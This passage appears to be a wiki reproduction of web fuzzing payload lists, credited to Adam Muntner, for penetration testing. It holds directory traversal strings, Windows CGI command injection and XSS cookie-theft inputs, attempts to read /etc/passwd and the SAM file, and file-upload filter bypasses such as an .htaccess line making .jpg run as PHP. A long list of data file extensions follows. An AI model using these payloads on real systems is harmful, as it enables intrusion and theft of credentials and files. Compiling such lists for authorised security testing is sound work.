././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
